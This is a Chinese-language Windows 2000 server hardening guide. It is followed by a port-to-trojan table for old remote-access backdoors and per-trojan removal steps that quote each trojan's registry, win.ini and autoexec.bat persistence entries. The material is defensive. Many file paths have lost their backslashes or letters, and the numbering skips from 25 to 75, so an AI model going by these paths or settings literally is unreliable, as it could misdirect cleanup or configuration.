一个好的密码对于一个网络是非常重要的,但是它是最容易被忽略的。前面的所说的也许已经可以说明这一点了。一些公司的管理员创建帐号的时候往往用公司名,计算机名,或者一些别的一猜就到的东西做用户名,然后又把这些帐户的密码设置得N简单,比如 “welcome” “iloveyou” “letmein”或者和用户名相同等等。这样的帐户应该要求用户首此登陆的时候更改成复杂的密码,还要注意经常更改密码。前些天在IRC和人讨论这一问题的时候,我们给好密码下了个定义:安全期内无法破解出来的密码就是好密码,也就是说,如果人家得到了你的密码文档,必须花43天或者更长的时间才能破解出来,而你的密码策略是42天必须改密码。
9.设置屏幕保护密码
很简单也很有必要,设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。注意不要使用OpenGL和一些复杂的屏幕保护程序,浪费系统资源,让他黑屏就可以了。还有一点,所有系统用户所使用的机器也最好加上屏幕保护密码。
10. 使用NTFS格式分区
把服务器的所有分区都改成NTFS格式。NTFS文件系统要比FAT,FAT32的文件系统安全得多。这点不必多说,想必大家得服务器都已经是NTFS的了。
11.运行防毒软件
我见过的Win2000/Nt服务器从来没有见到有安装了防毒软件的,其实这一点非常重要。一些好的杀毒软件不仅能杀掉一些著名的病毒,还能查杀大量木马和后门程序。这样的话,“黑客”们使用的那些有名的木马就毫无用武之地了。不要忘了经常升级病毒库
12.保障备份盘的安全
一旦系统资料被破坏,备份盘将是你恢复资料的唯一途径。备份完资料后,把备份盘防在安全的地方。千万别把资料备份在同一台服务器上,那样的话,还不如不要备份。
中级安全篇:
1.利用win2000的安全配置工具来配置策略
微软提供了一套的基于MMC(管理控制台)安全配置和分析工具,利用他们你可以很方便的配置你的服务器以满足你的要求。具体内容请参考微软主页:
http://www.microsoft.com/windows ... urity/sctoolset.asp
2.关闭不必要的服务
windows 2000 的 Terminal Services(终端服务),IIS ,和RAS都可能给你的系统带来安全漏洞。为了能够在远程方便的管理服务器,很多机器的终端服务都是开着的,如果你的也开了,要确认你已经正确的配置了终端服务。有些恶意的程序也能以服务方式悄悄的运行。要留意服务器上面开启的所有服务,中期性(每天)的检查他们。下面是C2级别安装的默认服务:
Computer Browser service TCP/IP NetBIOS Helper
Microsoft DNS server Spooler
NTLM SSP Server
RPC Locator WINS
RPC service Workstation
Netlogon Event log
3.关闭不必要的端口
关闭端口意味着减少功能,在安全和功能上面需要你作一点决策。如果服务器安装在防火墙的后面,冒的险就会少些,但是,永远不要认为你可以高枕无忧了。用端口扫描器扫描系统所开放的端口,确定开放了哪些服务是黑客入侵你的系统的第一步。\system32\drivers\etc\services 文件中有知名端口和服务的对照表可供参考。具体方法为:
网上邻居>属性>本地连接>属性>internet 协议(tcp/ip)>属性>高级>选项>tcp/ip筛选>属性 打开tcp/ip筛选,添加需要的tcp,udp,协议即可。
4.打开审核策略
开启安全审核是win2000最基本的入侵检测方法。当有人尝试对你的系统进行某些方式(如尝试用户密码,改变帐户策略,未经许可的文件访问等等)入侵的时候,都会被安全审核记录下来。很多的管理员在系统被入侵了几个月都不知道,直到系统遭到破坏。下面的这些审核是必须开启的,其他的可以根据需要增加:
策略 设置
审核系统登陆事件 成功,失败
审核帐户管理 成功,失败
审核登陆事件 成功,失败
审核对象访问 成功
审核策略更改 成功,失败
审核特权使用 成功,失败
审核系统事件 成功,失败
5.开启密码密码策略
策略 设置
密码复杂性要求 启用
密码长度最小值 6位
强制密码历史 5 次
强制密码历史 42 天
6.开启帐户策略
策略 设置
复位帐户锁定计数器 20分钟
帐户锁定时间 20分钟
帐户锁定阈值 3次
7.设定安全记录的访问权限
安全记录在默认情况下是没有保护的,把他设置成只有Administrator和系统帐户才有权访问。
8.把敏感文件存放在另外的文件服务器中
虽然现在服务器的硬盘容量都很大,但是你还是应该考虑是否有必要把一些重要的用户数据(文件,数据表,项目文件等)存放在另外一个安全的服务器中,并且经常备份它们。
9.不让系统显示上次登陆的用户名
默认情况下,终端服务接入服务器时,登陆对话框中会显示上次登陆的帐户明,本地的登陆对话框也是一样。这使得别人可以很容易的得到系统的一些用户名,进而作密码猜测。修改注册表可以不让对话框里显示上次登陆的用户名,具体是:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DontDisplayLastUserName
把 REG_SZ 的键值改成 1 .
10.禁止建立空连接
默认情况下,任何用户通过通过空连接连上服务器,进而枚举出帐号,猜测密码。我们可以通过修改注册表来禁止建立空连接:
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成”1”即可。
10.到微软网站下载最新的补丁程序
很多网络管理员没有访问安全站点的习惯,以至于一些漏洞都出了很久了,还放着服务器的漏洞不补给人家当靶子用。谁也不敢保证数百万行以上代码的2000不出一点安全漏洞,经常访问微软和一些安全站点,下载最新的service pack和漏洞补丁,是保障服务器长久安全的唯一方法。
高级篇
1. 关闭 DirectDraw
这是C2级安全标准对视频卡和内存的要求。关闭DirectDraw可能对一些需要用到DirectX的程序有影响(比如游戏,在服务器上玩星际争霸?我晕..$%$^%^&??),但是对于绝大多数的商业站点都应该是没有影响的。 修改注册表 HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI 的Timeout(REG_DWORD)为 0 即可。
2.关闭默认共享
win2000安装好以后,系统会创建一些隐藏的共享,你可以在cmd下打 net share 查看他们。网上有很多关于IPC入侵的文章,相信大家一定对它不陌生。要禁止这些共享 ,打开 管理工具>计算机管理>共享文件夹>共享 在相应的共享文件夹上按右键,点停止共享即可,不过机器重新启动后,这些共享又会重新开启的。
默认共享目录 路径和功能
C$ D$ E$ 每个分区的根目录。Win2000 Pro版中,只有Administrator
和Backup Operators组成员才可连接,Win2000 Server版本
Server Operatros组也可以连接到这些共享目录
ADMIN$ %SYSTEMROOT% 远程管理用的共享目录。它的路径永远都
指向Win2000的安装路径,比如 c:\winnt
FAX$ 在Win2000 Server中,FAX$在fax客户端发传真的时候会到。
IPC$ 空连接。IPC$共享提供了登录到系统的能力。
NetLogon 这个共享在Windows 2000 服务器的Net Login 服务在处
理登陆域请求时用到
PRINT$ %SYSTEMROOT%\SYSTEM32\SPOOL\DRIVERS 用户远程管理打印机
3.禁止dump file的产生
dump文件在系统崩溃和蓝屏的时候是一份很有用的查找问题的资料(不然我就照字面意思翻译成垃圾文件了)。然而,它也能够给黑客提供一些敏感信息比如一些应用程序的密码等。要禁止它,打开 控制面板>系统属性>高级>启动和故障恢复 把 写入调试信息 改成无。要用的时候,可以再重新打开它。
4.使用文件加密系统EFS
Windows2000 强大的加密系统能够给磁盘,文件夹,文件加上一层安全保护。这样可以防止别人把你的硬盘挂到别的机器上以读出里面的数据。记住要给文件夹也使用EFS,而不仅仅是单个的文件。 有关EFS的具体信息可以查看
http://www.microsoft.com/windows ... ecurity/encrypt.asp
5.加密temp文件夹
一些应用程序在安装和升级的时候,会把一些东西拷贝到temp文件夹,但是当程序升级完毕或关闭的时候,它们并不会自己清除temp文件夹的内容。所以,给temp文件夹加密可以给你的文件多一层保护。
6.锁住注册表
在windows2000中,只有administrators和Backup Operators才有从网络上访问注册表的权限。如果你觉得还不够的话,可以进一步设定注册表访问权限,详细信息请参考:
http://support.microsoft.com/support/kb/articles/Q153/1/83.asp
7.关机时清除掉页面文件
页面文件也就是调度文件,是win2000用来存储没有装入内存的程序和数据文件部分的隐藏文件。一些第三方的程序可以把一些没有的加密的密码存在内存中,页面文件中也可能含有另外一些敏感的资料。 要在关机的时候清楚页面文件,可以编辑注册表
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
把ClearPageFileAtShutdown的值设置成1。
8.禁止从软盘和CD Rom启动系统
一些第三方的工具能通过引导系统来绕过原有的安全机制。如果你的服务器对安全要求非常高,可以考虑使用可移动软盘和光驱。把机箱锁起来扔不失为一个好方法。
9.考虑使用智能卡来代替密码
对于密码,总是使安全管理员进退两难,容易受到 10phtcrack 等工具的攻击,如果密码太复杂,用户把为了记住密码,会把密码到处乱写。如果条件允许,用智能卡来代替复杂的密码是一个很好的解决方法。
10.考虑使用IPSec
正如其名字的含义,IPSec 提供 IP 数据包的安全性。IPSec 提供身份验证、完整性和可选择的机密性。发送方计算机在传输之前加密数据,而接收方计算机在收到数据之后解密数据。利用IPSec可以使得系统的安全性能大大增强。有关IPSes的详细信息可以参考: http://www.microsoft.com/china/technet/security/ipsecloc.asp
下面的列表给出了现有木马和他们所用端口的对应表。低端口常用来窃取口令并传送给黑客。
高端口常用来通过网络远程控制木马程序。
The problem with Remote Access trojans or trojans trying to steal passwords
is fairly new. Today there are no programs, antivirus or antitrojan programs,
which can detect unknown trojan horses. The programs claiming to defend you can
usually only find a fraction of all the trojans out there - 17 written in 1997,
81 constructed the following year, and at least 156 new trojans thus far in1999.
Port
Trojan
21
FTP Open Server Port
21
Blade Runner, Doly Trojan, Fore, Invisible, FTP, WebEx, WinCrash
23
Tiny Telnet Server
25
Antigen, Email Password Sender, Haebu, Coceda, Shtrilitz, Stealth,
Terminator, WinPC, WinSpy
25
SMTP
31
Master Paradise.80 Port
31
Hackers Paradise
53
Bonk (DoS Exploit) Port
80
Executer 1.0a Port
80
Executor, WWW
110
POP3
121
BO jammerkillah Port
137
Name Service (Netbios over IP) Windows
138
Datagram Service (Netbios over IP) Windows
139
WinNuke / Landc (DoS Exploit) Port
139
Session Service (Netbios over IP) Windows
456
Hackers Paradise Port
456
Hackers Paradise
555
Stealth Spy Port
555
Phase0 Port
555
IniKiller, Phase Zero, Stealth Spy
666
Attack FTP Port
666
Satanz Backdoor
777
AIM Spy
1000
Der Spaeher3, Insane Network
1001
Der Spaeher3, Insane Network
1001
Silencer Port
1001
WebEx Port
1001
Silencer, WebEx
1003
BackDoor.200 Port
1003
BackDoor.201 Port
1003
BackDoor.202 Port
1010
Doly trojan v1.35 Port
1011
Doly Trojan Port
1011
Doly Trojan
1011
Trojan Dolly Version 1.1/1.2
1015
Doly trojan v1.5 Port
1015
Trojan Dolly Version 1.5
1016
Trojan Dolly Version 1.6/1.7
1024
1025 NetSpy.698 Port
1029
InCommand
1033
Netspy Port
1035
Trojan Dolly Version 1.35
1042
Bla1.1 Port
1047
GateCrasher.b Port
1047
GateCrasher.c Port
1050
MiniCommand 1.2
1080
Wingate Port
1170
Psyber Stream Server, Voice
1207
SoftWar
1234
Ultors Trojan
1243
SubSeven Port
1243
Sub 7.2
1245
Vodoo Port
1245
VooDoo Doll
1269
Maverick's Matrix Port
1492
BackOriffice.FTP Port
1492
FTP99CMP (BO.FTP) Port
1492
FTP99CMP
1509
Streaming Server Port
1600
Shiv Port
1600
Shivka
1807
SpySender Port
1807
SpySender
1981
ShockRave Port
1981
Shockrave
1999
Transmission of Scout v. 1.1
1999
Backdoor Port
1999
BackDoor.200 Port
1999
BackDoor.201 Port
1999
BackDoor.202 Port
1999
BackDoor.203 Port
1999
BackDoor
2000
Der Spaeher3, Insane Network
2001
Der Spaeher3, Insane Network
2001
TrojanCow Port
2001
Trojan Cow
2023
Pass Ripper Port
2023
Ripper
2115
Bugs
2140
DeepThroat.10 Port
2140
Invasor Port
2140
The Invasor Port
2140
Deep Throat, The Invasor
2283
Rat Port
2565
Striker Port
2583
Wincrash2 Port
2716
The Prayer
2773
SubSeven Key Logger
2801
Phineas Port
2801
Phineas Phucker
3024
WinCrash
3128
Squid Proxy
3129
MastersParadise.92 Port
3129
Masters Paradise
3150
DeepThroat.10 Port
3150
Invasor Port
3150
Deep Throat, The Invasor
3700
Portal of Doom
4092
WinCrash
4567
FileNail Port
4590
ICQTrojan
4950
IcqTrojan Port
5000
Blazer 5 Port
5000
Sockets de Troie
5001
Sockets de Troie
5031
NetMetropolitan2
5032
NetMetropolitan2
5321
Firehotcker Port
5321
Firehotcker
5400
BackConstruction1.2 Port
5400
BladeRunner Port
5400
Blade Runner
5401
Blade Runner
5402
Blade Runner
5550
Xtcp Port
5569
RoboHack Port
5569
RoboHack
5636
PC Crasher
5637
PC Crasher
5698
BackDoor.203 Port
5714
Wincrash3 Port
5741
Wincrash3 Port
5742
Wincrash Port
5742
WinCrash
6000
The Thing
6400
The Thing Port
6666
TCPShell.c
6669
Host Control
6669
Vampire Port
6670
Deep Throat Port
6670
DeepThroat
6671
Deep Throat Port
6767
NT Remote Control Port
6771
DeepThroat
6883
DeltaSource
6883
DeltaSource Port
6939
Indoctrination Port
6969
Gatecrasher.a Port
6969
GateCrasher, Priority
7000
Remote Grab
7215
SubSeven Matrix (Changeable)
7300
NetMonitor
7301
NetMonitor
7306
NetMonitor Port
7306
NetMonitor
7307
NetMonitor
7308
NetMonitor
7789
ICQKiller Port
7789
ICKiller
8080
Proxy
9872
Portal of Doom Port
9872
al of Doom
9873
al of Doom
9874
al of Doom
9875
Portal of Doom Port
9875
al of Doom
9989
InIkiller Port
9989
iNiKiller
9999
The Praye
10067
al of Doom
10167
Portal Of Doom Port
10167
al of Doom
10607
Coma Port
11000
Senna Spy Trojans Port
11000
Senna Spy
11050
Host Control
11223
ProgenicTrojan Port
11223
Progenic trojan
12076
Gjamer Port
1. 冰河v1.1 v2.2 这是国产最好的木马 作者:黄鑫
清除木马v1.1 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 查找以下的两个路径,并删除 "
C:windowssystem kernel32.exe" " C:windowssystem sysexplr.exe" 关闭Regedit
重新启动到MSDOS方式 删除C:windowssystem kernel32.exe和C:windowssystem
sysexplr.exe木马程序 重新启动。 OK
清除木马v2.2 服务器程序、路径用户是可以随意定义,写入注册表的键名也可以自己定义。 因此,不能明确说明。 你可以察看注册表,把可疑的文件路径删除。
重新启动到MSDOS方式 删除于注册表相对应的木马程序 重新启动Windows。OK
2. Acid Battery v1.0 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的Explorer
="C:WINDOWSexpiorer.exe" 关闭Regedit 重新启动到MSDOS方式 删除c:windowsexpiorer.exe木马程序
注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。 重新启动。OK
3. Acid Shiver v1.0 + 1.0Mod + lmacid 清除木马的步骤: 重新启动到MSDOS方式
删除C:windowsMSGSVR16.EXE 然后回到Windows系统 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的Explorer =
"C:WINDOWSMSGSVR16.EXE"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的Explorer = "C:WINDOWSMSGSVR16.EXE" 关闭Regedit 重新启动。OK 重新启动到MSDOS方式
删除C:windowswintour.exe然后回到Windows系统 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的Wintour =
"C:WINDOWSWINTOUR.EXE"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的Wintour = "C:WINDOWSWINTOUR.EXE" 关闭Regedit 重新启动。OK
4. Ambush 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的zka =
"zcn32.exe" 关闭Regedit 重新启动到MSDOS方式 删除C:Windows zcn32.exe 重新启动。OK
5. AOL Trojan 清除木马的步骤: 启动到MSDOS方式 删除C: command.exe(删除前取消文件的隐含属性)
注意:不要删除真的command.com文件。 删除C: americ~1.0uddyl~1.exe(删除前取消文件的隐含属性) 删除C:
windowssystem orton~1 egist~1.exe(删除前取消文件的隐含属性) 打开WIN.INI文件
在[WINDOWS]下面"run="和"load="都加载者特洛伊木马程序的路径,必须清除它们: run= load= 保存WIN.INI
还要改正注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的WinProfile
= c:command.exe 关闭Regedit,重新启动Windows。OK
6. Asylum v0.1, 0.1.1, 0.1.2, 0.1.3 + Mini 1.0, 1.1 清除木马的步骤:
注意:木马程序默认文件名是wincmp32.exe,然而程序可以随意改变文件名。 我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件 在[BOOT]下面有个"shell=文件名"。正确的文件名是explorer.exe
如果不是"explorer.exe",那么那个文件就是木马程序,把它查找出来,删除。 保存退出system.ini 打开win.ini文件
在[WINDOWS]下面有个run= 如果你看到=后面有路径文件名,必须把它删除。 正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马,把它查找出来,删除。 保存退出win.ini。 OK
7. AttackFTP 清除木马的步骤: 打开win.ini文件 在[WINDOWS]下面有load=wscan.exe 删除wscan.exe
,正确是load= 保存退出win.ini。 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的Reminder="wscan.exe /s" 关闭Regedit,重新启动到MSDOS系统中 删除C:windowssystem
wscan.exe OK
8. Back Construction 1.0 - 2.5 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的"C:WINDOWSCmctl32.exe" 关闭Regedit,重新启动到MSDOS系统中 删除C:WINDOWSCmctl32.exe OK
9. BackDoor v2.00 - v2.03 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的'c:windows otpa.exe /o=yes' 关闭Regedit,重新启动到MSDOS系统中
删除c:windows otpa.exe 注意:不要删除真正的notepad.exe笔记本程序 OK
10. BF Evolution v5.3.12 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的(Default)=" " 关闭Regedit,再次重新启动计算机。 将C:windowssystem .exe(空格exe文件) OK
11. BioNet v0.84 - 0.92 + 2.21 0.8X版本是运行在Win95/98 0.9X以上版本有运行在Win95/98
和WinNT上两个软件 客户-服务器协议是一样的,因而NT客户能黑95/98被感染的机器,和Win95/98客户能黑 NT被感染的系统完全一样。
清除木马的步骤: 首先准备一张98的启动盘,用它启动后,进入c:windows目录下,用attrib libupd~1. exe -h
命令让木马程序可见,然后删除它。 抽出软盘后重新启动,进入98下,在注册表里找到:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
的子键WinLibUpdate = "c:windowslibupdate.exe -hide" 将此子键删除。
12. Bla v1.0 - 5.03 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的Systemdoor
= "C:WINDOWSSystemmprdll.exe" 关闭Regedit,重新启动计算机。
查找到C:WINDOWSSystemmprdll.exe和 C:WINDOWSsystem undll.exe
注意:不要删除C:WINDOWSRUNDLL.EXE正确文件。 并删除两个文件。 OK
13. BladeRunner 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 可以找到System-Tray
= "c:somethingsomething.exe" 右边的路径可能是任何东西,这时你不需要删除它,因为木马会立即自动加上,你需要
的是记下木马的名字与目录,然后退回到MS-DOS下,找到此木马文件并删除掉。 重新启动计算机,然后重复第一步,在注册表中找到木马文件并删除此键。
14. Bobo v1.0 - 2.0 清除木马v1.0 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的DirrectLibrarySupport ="C:WINDOWSSYSTEMDllclient.exe" 关闭Regedit,重新启动计算机。
DEL C:WindowsSystemDllclient.exe OK 清除木马v2.0 打开注册表Regedit 点击目录至:
HKEY_USER/.Default/Software/Mirabilis/ICQ/Agent/Apps/ICQ Accel/ ICQ
Accel是一个“假象“的主键,选中ICQ Accel主键并把它删除。 重新启动计算机。OK
15. BrainSpy vBeta 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 右边有 ??? =
"C:WINDOWSsystemBRAINSPY .exe" ???标签选是随意改变的。 关闭Regedit,重新启动计算机
查找删除C:WINDOWSsystemBRAINSPY .exe OK
16. Cain and Abel v1.50 - 1.51 这是一个口令木马 进入MS-DOS方式 查找到C:windowsmsabel32.exe
并删除它。OK
17. Canasson 清除木马的步骤: 打开WIN.INI文件 查找c:msie5.exe,删除全部主键 保存win.ini 重新启动计算机
删除c:msie5.exe木马文件 OK
18. Chupachbra 清除木马的步骤: 打开WIN.INI文件 [Windows]的下面有两个行 run=winprot.exe
load=winprot.exe 删除winprot.exe run= load= 保存Win.ini,再打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 删除右边的'System
Protect' = winprot.exe 重新启动Windows 查找到C:windowssystem winprot.exe,并删除。 OK
19. Coma v1.09 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 删除右边的'RunTime'
= C:windowsmsgsrv36.exe 重新启动Windows 查找到C:windows msgsrv36.exe,并删除。 OK
20. Control 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 删除右边的Load MSchv
Drv = C:windowssystemMSchv.exe 保存Regedit,重新启动Windows
查找到C:windowssystemMSchv.exe,并删除。 OK
21. Dark Shadow 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRunServices
删除右边的winfunctions="winfunctions.exe" 保存Regedit,重新启动Windows 查找到C:windowssystem winfunctions.exe,并删除。 OK
22. DeepThroat v1.0 - 3.1 + Mod (Foreplay) 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 版本1.0
删除右边的项目'System32'=c:windowssystem32.exe 版本2.0-3.1 删除右边的项目'SystemTray' =
'Systray.exe' 保存Regedit,重新启动Windows 版本1.0删除c:windowssystem32.exe 版本2.0-3.1
删除c:windowssystemsystray.exe OK
23. Delta Source v0.5 - 0.7 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 删除右边的项目:DS
admin tool = C:TEMPSERVER.exe 保存Regedit,重新启动Windows 查找到C:TEMPSERVER.exe,并删除它。 OK
24. Der Spaeher v3 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun 删除右边的项目:explore
= "c:windowssystemdkbdll.exe " 保存Regedit,重新启动Windows
删除c:windowssystemdkbdll.exe木马文件。 OK --
25. Doly v1.1 - v1.7 (SE) 清除木马V1.1-V1.5版本:
这几个木马版本的木马程序放在三处,增加二个注册项目,还增加到Win.ini项目。
首先,进入MS-DOS方式,删除三个木马程序,但V1.35版本多一个木马文件mdm.exe。 把下列各项全部删除:
C:WINDOWSSYSTEM esk.sys C:WINDOWSStart MenuProgramsStartupmstesk.exe
c:Program FilesMStesk.exe c:Program FilesMdm.exe 重新启动Windows。 接着,打开win.ini文件
找到[WINDOWS]下面load=c:windowssystem esk.exe项目,删除路径,改变为load= 保存win.ini文件。
最后,修改注册表Regedit 找到以下两个项目并删除它们
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Ms tesk =
"C:Program FilesMStesk.exe" 和
HKEY_USER.DefaultSoftwareMicrosoftWindowsCurrentVersionRun Ms tesk =
"C:Program FilesMStesk.exe"
再寻找到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionss
这个组是木马的全部参数选择和设置的服务器,删除这个ss组的全部项目。 关闭保存Regedit。 还有打开C:AUTOEXEC.BAT文件,删除 @echo
off copy c:sys.lon c:windowsStartMenuStartup Items del c:win.reg
关闭保存autoexec.bat。 OK
清除木马V1.6版本: 该木马运行时,将不能通过98的正常操作关闭,只能RESET键。彻底清除步骤如下: 1.打开控制面板——添加删除程序——删除memory
manager 3.0,这就是木马程序,但 是它并不会把木马的EXE文件删除掉。
2.用98或DOS启动盘启动(用RESET键)后,转入C:,编辑AUTOEXEC。BAT,把如下内容 删除: @echo off copy
c:sys.lon c:windowsstartm~1programsstartupmdm.exe del c:win.reg
保存AUTOEXEC。BAT文件并返回DOS后,在C:根目录下删除木马文件: del sys.lon del
windowsstartm~1programsstartupmdm.exe del progra~1mdm.exe
3.抽出软盘重新启动,进入98后,把c:program files目录下的memory manager 目录 删除。 清除木马V1.7版本:
首先,打开C:AUTOEXEC.BAT文件,删除 @echo off copy c:sys.lon
c:windowsstartm~1programsstartupmdm.exe del c:win.reg 关闭保存autoexec.bat
然后打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersionRun
找到c:windowssystemmdm.exe路径并删除这个项目 点击目录至:
HKEY_USER/.Default/Software/Marabilis/ICQ/Agent/Apps/
找到"C:windowssystemkernal32.exe"路径并删除这个项目 关闭保存Regedit。重新启动Windows。
最后,删除以下木马程序: c:sys.lon c:iecookie.exe c:windowsstart
menuprogramsstartupmdm.exe c:program filesmdm.exe c:windowssystemmdm.exe
c:windowssystemkernal32.exe 注意:kernal32是A OK
75. Revenger v1.0 - 1.5 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:AppName ="C:...server.exe" 关闭保存Regedit,重新启动Windows
在c:windows查找相应的木马程序server.exe,并删除 OK
76. Ripper 清除木马的步骤: 打开system.ini文件 将shell=explorer.exe sysrunt.exe 改为shell=
explorer.exe 关闭保存system.ini,重新启动Windows 在c:windows查找相应的木马程序sysrunt.exe,并删除 OK
77. Satans Back Door v1.0 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的项目:sysprot protection ="C:windowssysprot.exe" 关闭保存Regedit,重新启动Windows
删除C:windowssysprot.exe OK
78. Schwindler v1.82 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:User.exe = "C:WINDOWSUser.exe" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSUser.exe OK
79. Setup Trojan (Sshare) +Mod Small Share 这个共享隐藏C盘的木马 清除木马的步骤: 打开注册表Regedit
点击目录至: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan
选择右边有'C$'的项目,并全部删除 关闭保存Regedit,重新启动Windows OK
80. ShadowPhyre v2.12.38 - 2.X 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:WinZipp = "C:WINDOWSSYSTEMWinZipp.exe /nomsg" 或者WinZip =
"C:WINDOWSSYSTEMWinZip.exe /nomsg" 关闭保存Regedit,重新启动Windows 删除C:WINDOWS
WinZipp.exe或者C:WINDOWS WinZip.exe OK
81. Share All 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan
这里你将看到所有被木马共享出来的你的硬盘符号,把它们一个个删除掉。
82. ShitHeap 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的项目:recycle-bin = "c:windowssystem ecycle-bin.exe" 或者recycle-bin =
"c:windowssystem.exe" 关闭保存Regedit,重新启动Windows
删除c:windowssystem ecycle-bin.exe或者c:windowssystem.exe OK
83. Snid v1 - 2 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:System-tray = 'c:windows emp$01.exe' 关闭保存Regedit,重新启动Windows
删除c:windows emp$01.exe OK
84. Softwarst 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:NetApp
= C:windowssystemwinserv.exe 关闭保存Regedit,重新启动Windows
删除C:windowssystemwinserv.exe OK
85. Spirit 2000 Beta - v1.2 (fixed) 清除木马v Beta版本: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:internet = "c:windows etip.exe " 关闭保存Regedit 打开win.ini文件
查找到run=c:windows etip.exe 更改为:run= 关闭保存win.ini,重新启动Windows
删除c:windows etip.exe和c:windows etip.exe OK
清除木马v 1.2版本: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:SystemTray = "c:windowswindown.exe " 关闭保存Regedit,重新启动Windows
删除c:windowswindown.exe OK
清除木马v 1.2(fixed)版本: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:Server
1.2.exe = "c:windowsserver 1.2.exe" 关闭保存Regedit,重新启动Windows
删除c:windowsserver 1.2.exe OK
86. Stealth v2.0 - 2.16 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:Winprotect System = "C:WINDOWSwinprotecte.exe 关闭保存Regedit,重新启动Windows 删除C:WINDOWSwinprotecte.exe OK
87. SubSeven - Introduction 清除木马v1.0 - 1.1: 打开注册表Regedit 点击目录至:
